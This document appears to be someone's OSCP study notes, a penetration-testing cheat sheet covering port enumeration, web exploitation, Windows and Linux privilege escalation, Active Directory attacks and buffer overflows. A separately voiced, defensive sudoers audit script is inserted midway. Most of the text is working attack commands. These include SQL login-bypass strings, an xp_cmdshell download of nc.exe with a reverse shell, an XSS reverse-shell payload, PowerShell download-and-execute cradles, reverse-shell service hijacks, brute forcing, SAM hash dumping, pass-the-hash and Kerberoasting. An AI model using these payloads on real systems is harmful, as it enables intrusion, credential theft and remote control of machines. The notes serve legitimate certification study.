I Passed the OSCP in January 2021. These are the notes I took along my journey to achieving it.
- Enumeration
- Web Exploitation
- Post Exploitation Linux
- Post Exploitation Windows
- Active Directory
- Pivoting & Port Forwarding
- Other
- Buffer Overflow
Basics
- Standard Port Scan
sudo nmap -T4 -p- -A --osscan-guess --version-all -oN in.scan -Pn <RHOST>
- UDP Port Scan
sudo nmap --top-ports 100 -sU -oN udp.scan -Pn <RHOST>
- Extensions
txt,php,aspx,cgi,asp,html,jsp,pdf,doc,docx,xls,xlsx,rtf,bak,xml,xsl,phtml,sh,pl,py,config,php7,exe
- Wordlists
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt
TCP 21: FTP
- Download Everything
wget -m ftp://anonymous:anonymous@<RHOST>
- FTP Nmap Scan
nmap --script ftp-anon,ftp-bounce,ftp-brute,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum,ftp-syst -p21 <RHOST>
- SSL FTP Connection
openssl s_client -connect <RHOST>:21 -starttls ftp
TCP 22: SSH
- Bruteforce
hydra -l root -P /usr/share/wordlists/password/10k <RHOST> -t 4 ssh
TCP 25: SMTP
- Nmap Enumeration
sudo nmap --script "smtp-commands,smtp-open-relay,smtp-vuln*" -p25 <RHOST>
- User Enumeration
sudo nmap --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} -p25 <RHOST>
- Version Scan (MSF)
auxiliary/scanner/smtp/smtp_enum
- Manual Session: Introduction
HELO <LHOST> || EHLO <LHOST>
- Enumerate Users
EXPN <user> || VRFY <user>
- Send Mail From
MAIL FROM:test@test.org
- Send Mail To
RCPT TO:<user>
TCP 53: DNS
- Standard Enum (interactive nslookup)
nslookup
> server <RHOST>
> 127.0.0.1
> <RHOST>
- Zone Transfer
dig axfr @<RHOST> <dnsname>
- DNS Recon
dnsrecon -r 127.0.0.0/24 -n <RHOST>
dnsrecon -d <RHOST> -r 10.0.0.0/8
TCP 79: Finger Enumeration
TCP 88: Kerberos
TCP 110: POP3
- Nmap Enum Script
sudo nmap --script pop3-capabilities,pop3-ntlm-info -p110 <RHOST>
- Bruteforce
sudo nmap --script pop3-brute -p110 <RHOST>
auxiliary/scanner/pop3/pop3_login
- Login (manual session)
USER <username>
PASS <password>
list (list emails)
retr <email_num> (retrieve email)
TCP 111: RPCBIND
- Enumeration
rpcinfo -p <RHOST>
rpcinfo -s <RHOST>
TCP 119: NNTP
- Possible commands
HELP, LIST
TCP 135: MSRPC
- Nmap Scan
sudo nmap -n -sV -Pn -p 135 --script=msrpc-enum <RHOST>
- MSF Enum
use auxiliary/scanner/dcerpc/endpoint_mapper
use auxiliary/scanner/dcerpc/hidden
use auxiliary/scanner/dcerpc/management
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
- RPC Dump
/usr/bin/impacket-rpcdump <RHOST> -p 135
TCP 139/445: SMB/RPC
- smbmap
smbmap -H <RHOST>
- enum4linux-ng
/opt/enum4linux-ng/enum4linux-ng.py -A <RHOST>
- Version Scan (MSF)
use auxiliary/scanner/smb/smb_version
- Light Nmap
sudo nmap -p445 --script safe 10.10.10.100
- Enumerate Share Permissions
crackmapexec smb <RHOST> --shares
- Log Into Shares
smbclient //<RHOST>/<Share> -U <user>
- Dump Info (samrdump)
python3 /usr/share/doc/python3-impacket/examples/samrdump.py <RHOST>
- Dump Info (rpcclient)
rpcclient -U "" <RHOST>
TCP 143: IMAP
- Login
A001 login <user> <password>
- Alternatively, use the Evolution mail client to log in
TCP 389: LDAP
- ldapsearch
ldapsearch -h <rhost> -x
ldapsearch -h <rhost> -x -s base namingcontexts
ldapsearch -h <rhost> -x -b "<information from previous command>"
ldapsearch -h <rhost> -x -b "<information from previous command>" '(objectClass=Person)'
TCP 443: HTTPS
- Manually check the certificate
- Add DNS names from the certificate to /etc/hosts
- SSL Enum
nmap -sV --script ssl-enum-ciphers <RHOST>
- Nikto
nikto -h <RHOST> -p 443 -output nikto_443
- SSLScan
sslscan <RHOST>
TCP 1433: MSSQL
- Nmap Scan
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER <RHOST>
- Log In
sqsh -S <RHOST> -U <user>
- Another Login (MSF)
use auxiliary/scanner/mssql/mssql_login
TCP 1521: ORACLE
TCP 2049: NFS
- Show Mountable Files
showmount -a(d)(e) <RHOST>
TCP 3306: MYSQL
- Login
mysql -u <user> -p
- Extensive Nmap
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <RHOST>
- MSF Scripts
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_hashdump
mysql_enum
mysql_schemadump
mysql_start_up
TCP 3389: RDP
- Log In
rdesktop -u <user> -p <password> <RHOST>
UDP 161: SNMP
- Enum
snmpwalk -c public -v2c <RHOST>
snmp-check <RHOST>
Active Directory
- rpcclient
rpcclient <rhost> (-U '')
enumdomusers
enumdomains
srvinfo
setuserinfo2 <user> 23 '<new_pass>'
createdomuser <username>
setuserinfo2 <username> 24 <password>
- SMB
- Kerbrute
./kerbrute userenum --dc <rhost> -d <domain> <users.txt>
- NPUsers (dump hashes for users without Kerberos pre-authentication)
GetNPUsers.py -dc-ip <rhost> -no-pass -usersfile <users.txt> <domain>/
- Bloodhound.py
edit /etc/resolv.conf:
nameserver <rhost>
search <domain>
python3 bloodhound.py -u <user> -p <password> -ns <rhost> -d <domain> -c all
then run Bloodhound on the collected data
- ldap
SQL Injection
- SQLMap
sqlmap -r <burp_file>
- Test for SQLi
'
'-- -
ASCII(97)
' or 1=1--
'; waitfor delay '0:0:20'--
wfuzz -u http://<RHOST>/FUZZ -w /usr/share/seclists/Fuzzing/special-chars.txt
- Login Bypass
admin' --
admin' -- -
admin'-
admin' #
admin'/*
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or '1'='1--
admin') or ('1'='1--
- Abuse Command Shell (MSSQL)
' EXEC sp_configure 'xp_cmdshell', 1--
' reconfigure--
' EXEC xp_cmdshell 'certutil -urlcache -f http://<LHOST>:<LPORT>/nc.exe nc.exe'--
' EXEC xp_cmdshell "nc.exe -e cmd.exe <LHOST> <LPORT>";--
LFI/RFI
- Linux Path
../../../../../../../../etc/passwd
- Windows LFI
c:\windows\system32\drivers\etc\hosts
- RFI
http://<LHOST>:80/p0wny_shell.php
- Wordlists
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
CGI-BIN
- Popular Extensions: .sh & .pl
- Nmap Check
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/<vulnerable file>,cmd=ls <RHOST>
- MSF Check
auxiliary/scanner/http/apache_mod_cgi_bash_env
- MSF Exploit
exploit/multi/http/apache_mod_cgi_bash_env_exec
XSS
- Test (callback to your listener)
<img src=http://<lhost>:<lport>/>
- Reverse Shell
<img src=http://<lhost>/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'<LHOST>'$IFS'<LPORT>')>
CMS
- WordPress
wpscan --url http://<RHOST> (--api-token <token>) -e u,ap,at --plugins-detection aggressive
- Magento
Magescan
Bruteforce
- hydra
hydra -l admin -P /usr/share/wordlists/password/10k <RHOST> http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed' -V -t 64
File Upload
- Starting Web Server
python3 -m http.server 80
- Filetransfer
wget <LHOST>/<file>
curl http://<LHOST>/<file> -o <output-file>
echo "GET /<file> HTTP/1.0" | nc -n <LHOST> 80 > <out-file> && sed -i '1,7d' <out-file>
- Secure Filetransfers
on target: ncat -nvlp <port> --ssl > <out-file>
on kali: ncat -nv <RHOST> <RPORT> --ssl < <file-to-send>
Enum Tools
LinEnum
linux smart enumeration
linpeas
pspy
suid3num
Upgrade Shell
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl-z
stty raw -echo; fg
export TERM=xterm
stty -a (on kali, to read your own terminal size)
stty rows 32 columns 136
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Manual
- whoami / id / hostname
- cat /etc/issue
- cat /etc/*-release
- history
- w
- ls -l /etc/passwd
- ls -l /etc/shadow
- ls -l /etc/group
- sudo -l (check for env_keep+=LD_PRELOAD, check for env_keep+=LD_LIBRARY_PATH, sudo version under 1.9 / 1.8.27 exploitable)
- find / -group <mygroup> -ls 2>/dev/null
- find / -user <myuser> -ls 2>/dev/null
- cat /etc/exports (check for nfs)
- mount -l
- cat /etc/fstab
- /bin/lsblk
- lpstat -a
- lscpu
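The sudo -l item above says to look for env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH and the sudo version. The script below is an added hardening check, not part of the original notes: it audits a sudoers file for exactly those env_keep entries and flags a sudo version of 1.8.27 or older, the range the note lists. The sudoers content is constructed for the demo and the function names are my own; on a real host you would point it at /etc/sudoers and the files under /etc/sudoers.d.

```shell
#!/bin/sh
# Added audit helper (not from the original notes). Flags sudoers lines that keep
# LD_PRELOAD or LD_LIBRARY_PATH across sudo, and sudo versions of 1.8.27 or older.

# check_sudoers_env_keep FILE
# Prints every non-comment line that keeps LD_PRELOAD or LD_LIBRARY_PATH.
# Exit status: 0 when the file is clean, 1 when at least one such line exists.
check_sudoers_env_keep() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            "#"*) ;;   # comments are never active configuration
            *env_keep*LD_PRELOAD*|*env_keep*LD_LIBRARY_PATH*)
                printf 'RISK: %s\n' "$line"
                found=1 ;;
        esac
    done < "$1"
    return $found
}

# sudo_version_flagged VERSION
# Exit status 0 when VERSION (e.g. "1.8.21p2") is 1.8.27 or older, 1 otherwise.
# Splits on "." and "p" so patch levels like 1.8.21p2 compare on 1.8.21.
sudo_version_flagged() {
    printf '%s\n' "$1" | awk -F'[.p]' '{ v = $1 * 1000000 + $2 * 1000 + $3; exit !(v <= 1008027) }'
}

# installed_sudo_version
# Prints the version string from "sudo -V", or nothing if sudo is absent.
installed_sudo_version() {
    sudo -V 2>/dev/null | sed -n 's/^Sudo version //p' | head -n 1
}

# write_sample_sudoers
# Writes a constructed sudoers file to a temp path and prints that path.
write_sample_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sample, not a real host's configuration
Defaults env_reset
Defaults env_keep += "LD_PRELOAD"
Defaults env_keep+=LD_LIBRARY_PATH
# env_keep += "LD_PRELOAD" inside a comment must be ignored
root ALL=(ALL:ALL) ALL
EOF
    printf '%s\n' "$f"
}

# demo: run both checks, once against the constructed file and once against
# whatever sudo is installed locally (skipped when sudo is missing).
demo() {
    sample=$(write_sample_sudoers)
    if check_sudoers_env_keep "$sample"; then
        echo "sudoers sample: clean"
    else
        echo "sudoers sample: dangerous env_keep entries found"
    fi
    rm -f "$sample"
    v=$(installed_sudo_version)
    if [ -n "$v" ]; then
        if sudo_version_flagged "$v"; then
            echo "sudo $v: version is in the range the notes list as exploitable"
        else
            echo "sudo $v: not in the flagged range"
        fi
    else
        echo "sudo not installed here; skipping version check"
    fi
    return 0
}

demo
```

The env_keep match is deliberately loose (any line containing env_keep and one of the two variable names) so that the quoted, unquoted and spaced spellings sudoers accepts are all caught; the cost is that an env_delete line mentioning the same names would also be reported, which is acceptable for a check whose job is to surface lines for a human to read.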
Common Files
grep -Rli password <path>, with <path> in turn:
/
/home
/opt
/tmp
/var
Cron
/etc/cronjobs
Service Exploits
- ps aux | grep "^root"
- netstat -antup
- <service> -v
- <service> --version
- Debian: dpkg -l | grep <service>
- Rpm: rpm -qa | grep <service>
SUID & SGID
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- Check For Writeable Shared Files (Shell)
strace <service> 2>&1 | grep -iE "open|access|no such file"
create & compile the above linked shell
execute the service
- Incomplete Path
strings <service>
strace -v -f -e execve <service> 2>&1
if found, create a binary with a reverse shell in the /tmp directory and add it to PATH:
PATH=.:$PATH /service
Kernel Exploits
- uname -a
- searchsploit linux kernel <version> <distribution> priv esc
- linux exploit suggester
Network
ip a/ipconfig/ifconfig
route
ss -anp/netstat -anp
dnsdomainname
ls /etc | grep iptables
cat /etc/networks
netstat -punta
File Upload
- Starting Webserver
python3 -m http.server <LPORT>
- Certutil
certutil -urlcache -f "http://<LHOST>:<LPORT>/<file>" <output-file>
- SMB
on kali: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
on target: copy \\<myip>\kali\reverse.exe C:\tmp\reverse.exe
- Powershell
cmd /c powershell IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell.exe IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
powershell -c IEX(new-object net.webclient).downloadstring('http://<LHOST>/Invoke-PowerShellTcp.ps1')
- Curl
curl http://<LHOST>/<file> -o <file>
Enum Tools
- PowerUp
powershell -ep bypass; .\powerup.ps1; Invoke-AllChecks
- Sherlock
powershell -ep bypass; Import-Module .\sherlock.ps1; Find-AllVulns
Manual
whoami /priv | /groups | /all
systeminfo
hostname
net users | net user <user>
set
tasklist /SVC | tasklist /v
Kernel Exploits
Service Exploits
- Insecure Service Properties (SERVICE_START & SERVICE_STOP & SERVICE_CHANGE_CONFIG)
sc qc <service>
sc query <service>
sc config <service> binpath= "\"C:\<reverse_shell>\""
listener on kali, then start/stop the service
- Unquoted Service Path
SERVICE_START & SERVICE_STOP + unquoted service path
- Weak Registry Permissions
reg query <full path to service>
- Insecure Service Executables
check winpeas for a writeable service executable, replace the file with a reverse shell
- DLL Hijacking
check all services winpeas recognizes one by one: sc qc <service>
Scheduled Tasks
dir C:\windows\tasks
schtasks /query /fo LIST /v
Network
ipconfig | ifconfig
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
Registry
- Autorun
overwrite the autorun program with a reverse shell and restart
- Always Install Elevated
check winpeas for AlwaysInstallElevated
Common Files
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
C:\unattend.xml
C:\Windows\System32\
C:\Windows\System32\sysprep\
C:\sysprep.inf
C:\sysprep\sysprep.xml
Passwords
- Remote Login
use chisel to remotely forward port 445, then log in with winexe:
winexe -U <user>%<password> //<RHOST> cmd.exe
- Check for Passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
- Weak Permissions on SAM Files
python2 pwdump.py <SYSTEMFILE> <SAMFILE>
- Cracking the Password
hashcat -m 1000 --force <hash> <wordlist>
- PTH
pth-winexe -U '<entire-hash>' //<RHOST> cmd.exe
Manual
ipconfig /all
route print
arp -a
netstat -ano
C:\WINDOWS\System32\drivers\etc\hosts
netsh firewall show state
netsh firewall show config
netsh dump
net user
net user /domain
net group /domain
Powerview
powershell -ep bypass
. .\powerview.ps1
net accounts
Get-NetDomain
Get-NetDomainController
Get-DomainPolicy
Get-NetUser
Get-NetUser | select cn
Get-NetUser | select samaccountname
Get-NetComputer
Get-NetGroup
Get-NetGroupMember
Get-DomainUser -SPN
Get-NetLoggedon -ComputerName <pc-name>
Get-NetSession -ComputerName <pc-name>
Invoke-ShareFinder
Get-NETGPO
Invoke-Kerberoast
Bloodhound
powershell -ep bypass
. .\sharphound.ps1
Invoke-BloodHound -CollectionMethod All -Domain <domain> -ZipFileName file.zip
Download zip onto kali, import into bloodhound
https://github.com/fox-it/BloodHound.py
Cracking Ad Hashes
ntlm: hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
ntlmv2: hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
PASS THE PW & HASH
crackmapexec <ip>/24 -u <user> -d <DOMAIN> -p <password>
crackmapexec <protocol> <ip>/24 -u <user> -H <hash> --local
Token Impersonation
meterpreter > load incognito
list_tokens
impersonate_token <token>
Kerberoasting
Invoke-Kerberoast in powerview
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'c:\temp\hashcapture.txt' -width 8000
https://github.com/skelsec/kerberoast
GetUserSPNs.py -request -dc-ip <RHOST> <domain>/<user>
Password Spraying
- Create Password List
crunch <length> <length> -t <pw-core>%%%%
- Spray
crowbar -b rdp -s <ip>/32 -U users.txt -C pw.txt -n 1
Pivoting & Port Forwarding
- Chisel Reverse Port Forward
on host: sudo ./chisel.sh server --reverse --port <LPORT>
on target: chisel client <LHOST>:<LPORT> R:<PORT_TO_FWD>:127.0.0.1:<PORT_TO_FWD>
Hashcracking
- John
john --format=<format> --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
- Hashcat
hashcat -m <hashid> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O
hashcat -m <hashid> -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt -O -r /usr/share/hashcat/rules/best64.rule
cat pw | hashcat -r /usr/share/hashcat/rules/best64.rule --stdout > wordlist.txt
SSH Encrypted Key
/usr/share/john/ssh2john
Crack Zip Password
fcrackzip -uvDp /usr/share/wordlists/rockyou.txt file.zip
Tcp Dump
sudo tcpdump -i tun0 icmp
Images
binwalk <image>
binwalk -Me <image>
Recognize Encryption
Pip fix (Rarely works)
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python get-pip.py
python -m pip install requests
MYSQL
show databases;
use <database>
show tables;
select * from <table>;
Buffer Overflow
- Mona Workflow
!mona config -set workingfolder c:\mona\%p
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <crash_value + 400>
!mona findmsp -distance <crash_value>
+ retn = BBBB
!mona bytearray -b "\x00"
python bad_chars.py
!mona compare -f C:\mona\oscp\bytearray.bin -a <esp addr>
!mona jmp -r esp -cpb "\x00"
msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=4444 EXITFUNC=thread -b "\x00" -f py
padding = "\x90" * 16